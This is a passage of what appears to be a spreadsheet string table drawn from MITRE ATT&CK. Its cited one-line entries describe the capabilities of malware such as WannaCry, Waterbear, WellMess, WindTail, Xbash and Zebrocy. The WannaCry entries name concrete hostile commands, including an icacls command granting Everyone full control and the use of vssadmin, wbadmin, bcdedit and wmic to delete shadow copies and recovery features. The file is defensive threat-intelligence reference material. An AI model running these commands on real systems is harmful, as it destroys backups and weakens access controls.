    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim user name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate active windows.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate files and directories.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information about the host.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information on the victim username.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate services.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic and routes a custom cryptographic protocol over the [Tor](https://attack.mitre.org/software/S0183) circuit.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses an exploit in SMBv1 to spread itself to other remote systems on a network.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: US-CERT WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; to make some of its files hidden.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, &lt;code&gt;bcdedit&lt;/code&gt;, and &lt;code&gt;wmic&lt;/code&gt; to delete and disable operating system recovery features.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to copy itself to remote computers after gaining access via an SMB exploit.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) enumerates current remote desktop sessions and tries to execute the malware on each session.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) scans its local network segment for remote systems to try to exploit and copy itself to.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) will attempt to determine the local network segment it is a part of.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; and &lt;code&gt;icacls . /grant Everyone:F /T /C /Q&lt;/code&gt; to make some of its files hidden and grant all users full access controls.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) utilizes &lt;code&gt;wmic&lt;/code&gt; to delete shadow copies.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) creates the service "mssecsvc2.0" with the display name "Microsoft Security Center (2.0) Service."(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) has used DLL side loading to import and load a malicious DLL loader.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has the ability to decrypt its RC4 encrypted payload for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can hook the &lt;code&gt;ZwOpenProcess&lt;/code&gt; and &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; APIs called by the process of a security product to hide PIDs and TCP records from detection.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can scramble functions not to be executed again with random values.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can receive and load executables from remote C2 servers.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can leverage API functions for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has used RC4 encrypted shellcode.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can identify the process for a specific security product.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can inject decrypted shellcode into the LanmanServer service.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can query the Registry to retrieve data.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can find the presence of a specific security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) can use API hooks on "GetExtendedTcpTable" to retrieve a table containing a list of TCP endpoints available to the application.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can use thread injection to inject shellcode into the process of security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can archive files on the compromised host.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can exfiltrate files from the victim machine.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can decompress scripts received from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use TCP for C2 communications.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the IP address of the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the current username on the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can communicate to C2 with mutual TLS where client and server mutually check certificates.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has the ability to use DNS tunneling for C2 communications.(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can send files from the victim machine to C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can decode and decrypt data received from C2.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify domain group membership for the current user.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can write files to a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use junk data in the Base64 string for additional obfuscation.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute PowerShell scripts received from C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has used Base64 encoding to uniquely identify communication to and from the C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the computer name of a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the IP address and user domain on the target machine.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can collect the username on the victim machine to send to C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute command line scripts received from C2.(Citation: PWC WellMess July 2020)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can download files.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can inject files into running processes.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can open a command line interface.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can create a service.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is usually configured with primary and backup domains for C2 communications.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to search for and capture files on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to collect information on process creation.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to decrypt strings using hard-coded AES keys.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to receive and execute a self-delete command.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to enumerate the users home directory and the path to its own application bundle.(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can invoke Apple APIs &lt;code&gt;contentsOfDirectoryAtPath&lt;/code&gt;, &lt;code&gt;pathExtension&lt;/code&gt;, and (string) &lt;code&gt;compare&lt;/code&gt;.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can be delivered as a compressed, encrypted, and encoded payload.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can use the &lt;code&gt;open&lt;/code&gt; command to execute an application.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) can dump credentials.(Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) installs a service on the remote system, executes the command, then uninstalls the service.(Citation: Secpod Winexe June 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) exploits CVE-2016-4117 to allow an executable to gain escalated privileges.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) deletes its payload along with the payload's parent process after it finishes copying files.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) performs multiple process injections to hijack system processes and execute malicious code.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks for the presence of Bitdefender security software.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has decoded XOR encoded strings holding its configuration upon execution.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. (Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) can encode its configuration file with single-byte XOR encoding.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>A [Winnti for Windows](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the [Wiper](https://attack.mitre.org/software/S0041) malware.(Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getFirefoxPassword function to attempt to locate Firefox passwords.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.(Citation: XAgentOSX 2017) [XAgentOSX](https://attack.mitre.org/software/S0161) contains the showBackupIosFolder function to check for IOS device backups by running &lt;code&gt;ls -la ~/Library/Application\ Support/MobileSync/Backup/&lt;/code&gt;.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the execFile function to execute a specified file on the system using the NSTask:launch method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getProcessList function to run &lt;code&gt;ps aux&lt;/code&gt; to get running processes.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInstalledAPP function to run &lt;code&gt;ls -la /Applications&lt;/code&gt; to gather what applications are installed.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInfoOSX function to return the OS X version as well as the current user.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) uses SSL/TLS and RC4 to encrypt traffic.(Citation: Invincea XTunnel)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of accessing locally stored passwords on victims.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>The C2 server used by [XTunnel](https://attack.mitre.org/software/S0117) provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of probing the network for open ports.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) relays traffic between a C2 server and a victim.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) has been used to execute remote commands.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a cronjob for persistence if it determines it is on a Linux system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) has destroyed Linux-based databases as part of its ransomware capabilities.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a webpage hosted on Pastebin to update its C2 domain list.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can download additional malicious files from its C2 server.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious JavaScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use mshta for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can perform port scanning of TCP and UDP ports.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a Startup item for persistence if it determines it is on a Windows system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can use regsvr32 for executing scripts.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can collect IP addresses and local intranet information from a victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can execute malicious VBScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) uses HTTP for C2 communications.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) decrypts downloaded files before execution.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP GET requests to download other files that are executed in memory.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) encrypts its configuration file using a simple algorithm.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for antimalware solution processes on the system.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) checks for the system’s Windows OS version and hostname.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) uses HTTP for C2.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>The [ZLib](https://attack.mitre.org/software/S0086) backdoor compresses communications using the standard Zlib compression library.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate files and drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to download files.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to obtain screenshots of the compromised system.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to enumerate system information.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to discover and manipulate Windows services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) communicates over HTTP for C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) has the ability to execute shell commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) creates Registry keys to allow itself to run as various services.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251)  has used a method similar to RC4 as well as AES for encryption and hexadecimal for encoding data before exfiltration. (Citation: Securelist Sofacy Feb 2018)(Citation: ESET Zebrocy Nov 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) uses SSL and AES ECB for encrypting C2 communications.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
